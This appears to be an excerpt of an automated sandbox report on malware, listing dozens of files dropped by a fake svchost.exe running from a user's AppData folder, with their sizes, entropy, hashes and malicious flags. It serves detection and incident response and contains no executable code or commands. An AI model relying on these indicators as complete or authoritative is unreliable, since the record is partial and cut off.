                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2784
                                                          Entropy (8bit):7.909054892204252
                                                          Encrypted:false
                                                          SSDEEP:48:8Fcl32gb7coUdWFWDmz5Aq6sKmQQDtj41H1G0xR/TdS+oe9nXwkX:CcJNbz0WFWDoGsK2E1Y2BTdZ9nXx
                                                          MD5:AFED19F8032CD3FA32A791643E779065
                                                          SHA1:1A22B003DCAE07FF542EC86A8A64AB2164B7ED87
                                                          SHA-256:4864BBE2431F9F76E0C4455092550791DEDF933B73472D1792327CC3AFC67EDE
                                                          SHA-512:5519F2755CEA30886B13B464FA1CE51F3218ACEE05381390CD9388D6904926325A5F560434F94C8EF9377C1074FD66DCF42D5B20845ED8C1633DF67286E30217
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8320
                                                          Entropy (8bit):7.975345801347128
                                                          Encrypted:false
                                                          SSDEEP:192:SMXEUzl4vnYzc0v39mVHaRzhfpl7L7Gc92wemYDqpYFAt:SMtzcycO3MV6Rvl59oU5
                                                          MD5:1D5972063C458E9D661A99D7BF26588E
                                                          SHA1:558AB232F87CB488A9E89B312ED5805952D05D9A
                                                          SHA-256:2E45987EF57D900108D61243BDAD248FF02F00BC9B6F4EE15EAC363219308161
                                                          SHA-512:231F8A67A41B1A8CD4277E4C52F2AB3FEDBF9980E19CDF60D86012211959C695D4F10245C87EC91B2F1AF680A851297E614012D8A4FE17A270EF7498A5FA836C
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):6048
                                                          Entropy (8bit):7.9661735786348205
                                                          Encrypted:false
                                                          SSDEEP:96:rj95JiBqbfwXh1YZwGk3/xBKXynXRT9J0Dh3y8jVXTPQchGh6epJg+iuSPZmK+Ep:X95JiBmYhpFhXRTkY8jt0chwi3RmKaE7
                                                          MD5:6F5099EC78AC8FB128DCD295D9B925F6
                                                          SHA1:7417D170896F05C8A0FECE4A31D0A587984FAF2C
                                                          SHA-256:E87250BFF65FFBAF0260F34443A9CCAEEA7D831156306202C7F605BB0CE288E1
                                                          SHA-512:EFAEEA1789C77ADBC3691665DE4FFF543D7EF146891FEC0B49DACB90C406A2A114B32E62C0052868C7744C5DC1D9F5F21B01EFDEA178955281B04720786BAF35
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):19952
                                                          Entropy (8bit):7.9904547268236765
                                                          Encrypted:true
                                                          SSDEEP:384:sMclRZoplMmhmBYBluyQzNnLd9Mw449ruEAX7xSrw+uziYpL5ad:TcU8mhm6BllUhLMwVux7srimYrad
                                                          MD5:53827C3AD28EECF4E7ACB401CEC91EC7
                                                          SHA1:76B7FB986EA61BAA8F881C7003F71B92C657C870
                                                          SHA-256:E2D127743CA7F66C84C68042609FD1A40A0210FBFEBFC35E794DE89C20E5705C
                                                          SHA-512:5D04166E7259A5FE61F0F883E95454E39761D6D4A617F1CAFE995765BA4A3F504F8C4B82DFB5B9643D7536817170EA07418CE40AD9CB91C808AB2E30A4A51934
                                                          Malicious:true
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2176
                                                          Entropy (8bit):7.876476777735154
                                                          Encrypted:false
                                                          SSDEEP:48:Yf8xzmPKX3QDSOzjoD+jyb3TN8IYjC3yxWlOv7tyE2xaGN:rxyyXDOfoDb3TqzElOv7d2xtN
                                                          MD5:25F9381B11A5E2BD1CFB6E025407A0AE
                                                          SHA1:B9C594EDAF0514D78C47BC30CBC077C04810B196
                                                          SHA-256:8658760F9BF831621D2A30ED7C15E6B947ADF9C51314235EFCDCB383A18731A7
                                                          SHA-512:73BA9615E206B6EEAD99583FE7A1F234F759CFC0E0090C7F21ABECABC9F8F0C8FB31E6EBD0DC619DCE9F49A54B5CC41431520E5B6370B2D2D1445712CB547986
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4192
                                                          Entropy (8bit):7.9474537509946
                                                          Encrypted:false
                                                          SSDEEP:96:m5kr8p4+A5JRLhrwxajg9/FMrs8pAsGX+/LKufIggZZpuknj:m68pCkL/yAsg0LKK5gLbj
                                                          MD5:B00A01171ADB26C224CF5E25419B344F
                                                          SHA1:B03DDF5DA571AB7575E8A168718B1DEBADD13FA6
                                                          SHA-256:781AF47FB9955B07B2834E98CE9595642C9F41ECFB58E52B70AF23B0702F5307
                                                          SHA-512:5AC82B02AD3722EF6F21C546A43A45A38332FAC611E99EFC5AA3B2536F64419802B2C759132451BEE6065D1779A56CC6EEA30531EA75AEECD0798422613D432F
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):10432
                                                          Entropy (8bit):7.979056564952791
                                                          Encrypted:false
                                                          SSDEEP:192:PEXl087WtbfLUyVXrJFmzxIxeVe9jZ1AlluwgDcsDUyX:c19WtbwErJFCxIbV+luXbUyX
                                                          MD5:99F9C05B417C6E95E0F11FC4A432E95B
                                                          SHA1:047543FE75738A2F0AEA7EEEAC742D11858B85E7
                                                          SHA-256:393C6CEB7C567137E15E0D5A549F646CBC6FBF7A7E949F73EE4DFC2D37CBE6A1
                                                          SHA-512:EDBF488D83217246633F46CBF516D900D3BA36858065ADE50994A9B2BDAF82270EA283A8E364FCD6CD8C60E1A05054BF5F8EBE3366F1933054210FEBECC00BB8
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):25696
                                                          Entropy (8bit):7.9939830646130625
                                                          Encrypted:true
                                                          SSDEEP:768:7PoUm1KxHweK4AMyD8RPniqRnISE2ziF2f6KT:zozKqeK4AM/BbZIPkCu
                                                          MD5:ACDD6349CFD14CDCE2C0BB9794F2BA19
                                                          SHA1:E6DF92F9CE29ACCB70C9BD0094B2D9465407E407
                                                          SHA-256:75951A8867C98323447D5ACD4174FC9A66CD174F96E03700A83E57413F13EA3D
                                                          SHA-512:67E0CCD00814D80E61E2BBD3E51AF8AB30F365F18FCEE2B324199FE29D791541295FEA47168FE774A7A3C24BFFB49C567DA5CE98ABF104371ECB3207CA9E56F0
                                                          Malicious:true
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1856
                                                          Entropy (8bit):7.82970570163711
                                                          Encrypted:false
                                                          SSDEEP:48:lDTivfDcwIGArBsZ2arbNEo3UcBcgaOvlT9G8sv66PVH:lwfk7BqrJB3UQ7aO1s8KTH
                                                          MD5:A25891666B505B418900847FB816D727
                                                          SHA1:E4CC1E23435F7FC1DDF7D5AC8A5E2BB88FE46AA7
                                                          SHA-256:839D3E126EBED36377DEBEB1BF8D495349409E6607A60A56E2C8596D97F167A9
                                                          SHA-512:09ADF72C2F9CA77C7B8A8A2C404D13B54A38DB98C4019B33021743D076BB1C13D7F3547104C43D247BD6FB187E2BE89CDFC047E465857E12072A8CDEDF2A369F
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2768
                                                          Entropy (8bit):7.906240019567729
                                                          Encrypted:false
                                                          SSDEEP:48:bj5xpI2kfxwnXeRTgTIDlEL1jUj6VeeflntiTUmWWF8c:X5Q2kyXeRT2IR81o2VeeflWRF1
                                                          MD5:28179E823DC7629B833796B78E438101
                                                          SHA1:77AF09531752B41B0A8ADA15860F41836C4B4242
                                                          SHA-256:436CAFC6DC96DB09340D3BCCD6070DFBB84EC6D2CD163FA47BE76C30568579E4
                                                          SHA-512:E5DDE33A874FBFDF3B128CEB4C3B6E7F62DD9E791AC45A77F699358BF1C40FA23FCAD8C7E211815248F7E5B125C75F4DF9F65011492EBB0A36D2B0A957A9CB76
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4144
                                                          Entropy (8bit):7.940876124510287
                                                          Encrypted:false
                                                          SSDEEP:96:MK/tRJ6whYln0JVv9Bm9QiGNO0XcpKpypK4Nb5n8iQ7+fN7NgMVVKdD:MK/vJ9h20JVlBma60skKK+8iQ7+fNxgL
                                                          MD5:DC0855982F7C981B6F243A2ABD61D6B4
                                                          SHA1:B8FACBF355B7C3277E3AAC9445F57D10C62F7E51
                                                          SHA-256:696EA8C01E551180A049BB6A3F8ACD5771F66493468480E6852E496747156D1F
                                                          SHA-512:A25CCF93800D7F4F6FD303575C251D5BDF667679144193D8381089CD5578B90649450FD949C4AAAD1C6AA2B28F50143C21C374EF540E9F480DAA9C792418426A
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):7072
                                                          Entropy (8bit):7.970756364566833
                                                          Encrypted:false
                                                          SSDEEP:192:jORUtvmDFSdPdAciwoxqcP7IEHnOIsSKTVh3P:jOSvUeCHt1HP073P
                                                          MD5:F3DA69B1E9039FCF9BD96886BA4E0C6F
                                                          SHA1:DFDFC1042314D54CB4CA0DAE5B19DB3F4AC926DA
                                                          SHA-256:A00BB79936D879778D75F1B07C8520A2AA1F147ED3FAE195FB91B35E85329D8F
                                                          SHA-512:DDE66DCA4F9A1787155CCCFDA71111336E095D78004C8876441C57B83C0430831934880F37BE21F0C6615B74FE4E99FD9C7403305D303D638543691308C2C974
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1648
                                                          Entropy (8bit):7.804898483275565
                                                          Encrypted:false
                                                          SSDEEP:24:0pGipEYGQ+OKOe60Aj4hjbhX9yjf6Z270lKRkkU4qdTOG3sA0MSAgKal1XA/7m:z0jGeKKMhX9yj82Y8RidgiRgKGX5
                                                          MD5:2C7AF751CC04D69DFB93518855FA486C
                                                          SHA1:2A524BE93A99683BD5FFF07F691593AA11DCFBD0
                                                          SHA-256:C5E70C4591C17D626C5C182C7F2800B5D6131AC265D927B4FFFF6271F8C55ACE
                                                          SHA-512:3CBE7C8C7C898AA71AE48E0CE5068AE775B0423A24957D3D99960063F973D90D3CFCC94FF52FCB75001897E380B5B56A53C65DD8CD038175A6939AEE00DA64D6
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):5552
                                                          Entropy (8bit):7.963330114220022
                                                          Encrypted:false
                                                          SSDEEP:96:L2mHHQU5il7gWpMzGbKp3uavxy2vAhIFFQgY8inQUMvaMoQjRGdg:LJnQU5itpMz8Kp3NAOFDY3rMvelS
                                                          MD5:54F48AB681E4EAAF42597D23C87A2082
                                                          SHA1:B51BBFC7B522C773A691C58C3A9531EAD2A2C62E
                                                          SHA-256:A446ABC1514A796AD490BEE3567ED1D9180B64B203D1B6AA3CC8473494F90E84
                                                          SHA-512:CFA02E3A943DD5F6117B2B37C52A9A93F0478E49A996989375456ECE5324C55EE0876B3C6ED0534B8334F2627B245F8EF980A76CB96B93713864AD15A51BABCB
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1392
                                                          Entropy (8bit):7.746729580608851
                                                          Encrypted:false
                                                          SSDEEP:24:PnqL1pWExysKWbrSCly/mjxI7+8pltMQaDEoctKCL2xfrbypk9He7wgwASoFrh:fwSIyo1lygI7fltfafctKTxDbypk9HhG
                                                          MD5:015396CC7E2EB2FAE8091992E6715390
                                                          SHA1:BB32FCBEFEE223DA79291FBBD4F6A99606B57DF3
                                                          SHA-256:C84D2FF63A794D9AF488FAA922BA63B72C3EBD408183637C3F7DDFD32A51E965
                                                          SHA-512:3C32E006C089B8FE5949816E0152610CC2124229C808A49DA8724883CAA50607F8B6753B7A6AC80BCE3342FC8DC1F6497F69476C1CB44DAFDB11FE9F5D2131FE
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1728
                                                          Entropy (8bit):7.812674826531025
                                                          Encrypted:false
                                                          SSDEEP:48:VIMLE65Uc9Mxkjm2hmEKr5u4o18JQUWmSzMVGr:VIMLAci2wdu4g0QfmSzMVM
                                                          MD5:BE4DC7308B73BE7402FF54FAE4CC8FE4
                                                          SHA1:5594304A6444A234B298FC5D4E0AB24942B79D52
                                                          SHA-256:5645C84F9664A355CEE5A5B5BC8D2E3C2B292DE2597128258B9ABD963127286E
                                                          SHA-512:9E71265689FBE2A5041B5D729353FE743B2C6FFBF367C24AA8589A6D492B9611D8617D4B4AB270BFE6D9770792EF95FAF6DFBC6DAF3420AC8D817D4DD54F0D21
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
